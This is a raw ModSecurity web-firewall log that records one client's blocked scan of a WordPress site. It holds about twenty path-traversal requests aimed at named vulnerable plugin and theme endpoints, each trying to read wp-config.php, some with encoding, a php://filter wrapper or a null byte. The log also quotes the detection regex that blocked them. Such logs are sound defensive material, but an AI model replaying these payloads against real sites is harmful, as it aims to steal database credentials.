"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZEeffSIlOCjnXl5KlpegzQAAAFQ"] [Tue Apr 25 04:38:05.329484 2023] [:error] [pid 15579:tid 140447007586048] [client 37.120.213.169:42760] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "ZEeffSIlOCjnXl5KlpegzgAAAFI"] [Tue Apr 25 04:38:05.451607 2023] [:error] [pid 15579:tid 140447015978752] [client 37.120.213.169:42762] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZEeffSIlOCjnXl5KlpegzwAAAFE"] [Tue Apr 25 04:38:05.571538 2023] [:error] [pid 15580:tid 140447066334976] [client 37.120.213.169:42764] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "ZEeffd-GjcOLRjW9Sa4WtQAAAIs"] [Tue Apr 25 04:38:05.688518 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:42766] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZEeffd-GjcOLRjW9Sa4WtgAAAI8"] [Tue Apr 25 04:38:05.805062 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:42768] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZEeffd-GjcOLRjW9Sa4WtwAAAIA"] [Tue Apr 25 04:38:05.922362 2023] [:error] [pid 15889:tid 140447015978752] [client 37.120.213.169:42772] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZEeffV4G6tVEc6w5Us7hegAAANE"] [Tue Apr 25 04:38:06.043374 2023] [:error] [pid 15580:tid 140447015978752] [client 37.120.213.169:42774] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2Fwp-config.php&filename=..%2F..%2Fwp-config.php&contenttype=text%2Fhtml&transient=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZEefft-GjcOLRjW9Sa4WuAAAAJE"] [Tue Apr 25 04:38:06.164381 2023] [:error] [pid 15578:tid 140447194773248] [client 37.120.213.169:42776] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZEeffj754oNYNW-15_AYwgAAAAQ"] [Tue Apr 25 04:38:06.281122 2023] [:error] [pid 15578:tid 140447108298496] [client 37.120.213.169:42778] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "ZEeffj754oNYNW-15_AYwwAAAAY"] [Tue Apr 25 04:38:09.295686 2023] [:error] [pid 15889:tid 140447091513088] [client 37.120.213.169:42788] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZEefgV4G6tVEc6w5Us7hewAAAMg"] [Tue Apr 25 04:38:09.427561 2023] [:error] [pid 15579:tid 140447194773248] [client 37.120.213.169:42790] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "ZEefgSIlOCjnXl5Klpeg0wAAAEQ"] [Tue Apr 25 04:38:09.545654 2023] [:error] [pid 15579:tid 140447203165952] [client 37.120.213.169:42792] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZEefgSIlOCjnXl5Klpeg1AAAAEM"] [Tue Apr 25 04:38:09.666223 2023] [:error] [pid 15578:tid 140447015978752] [client 37.120.213.169:42794] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZEefgT754oNYNW-15_AYxgAAABE"] [Tue Apr 25 04:38:11.887352 2023] [:error] [pid 15580:tid 140447049549568] [client 37.120.213.169:42808] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZEefg9-GjcOLRjW9Sa4WuwAAAI0"] [Tue Apr 25 04:38:12.005699 2023] [:error] [pid 15889:tid 140447074727680] [client 37.120.213.169:42812] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dilima/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dilima/pic.php"] [unique_id "ZEefhF4G6tVEc6w5Us7hfAAAAMo"] [Tue Apr 25 04:38:12.131044 2023] [:error] [pid 15889:tid 140446974015232] [client 37.120.213.169:42816] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php?path=..%2F..%2F..%2Fwp-config.php&type=aplication%2Fpdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php"] [unique_id "ZEefhF4G6tVEc6w5Us7hfgAAANY"] [Tue Apr 25 04:38:12.949563 2023] [:error] [pid 15578:tid 140447007586048] [client 37.120.213.169:42820] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "ZEefhD754oNYNW-15_AYygAAABI"] [Tue Apr 25 04:38:13.075442 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:42822] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtheme-unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtheme-unus/css/css.php"] [unique_id "ZEefhV4G6tVEc6w5Us7hfwAAAMY"] [Tue Apr 25 04:38:13.916250 2023] [:error] [pid 15578:tid 140446990800640] [client 37.120.213.169:42826] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZEefhT754oNYNW-15_AYywAAABQ"] [Tue Apr 25 04:38:14.032180 2023] [:error] [pid 15889:tid 140447228344064] [client 37.120.213.169:42828] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZEefhl4G6tVEc6w5Us7hgQAAAMA"] [Tue Apr 25 04:38:14.214391 2023] [:error] [pid 15889:tid 140447024371456] [client 37.120.213.169:42830] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 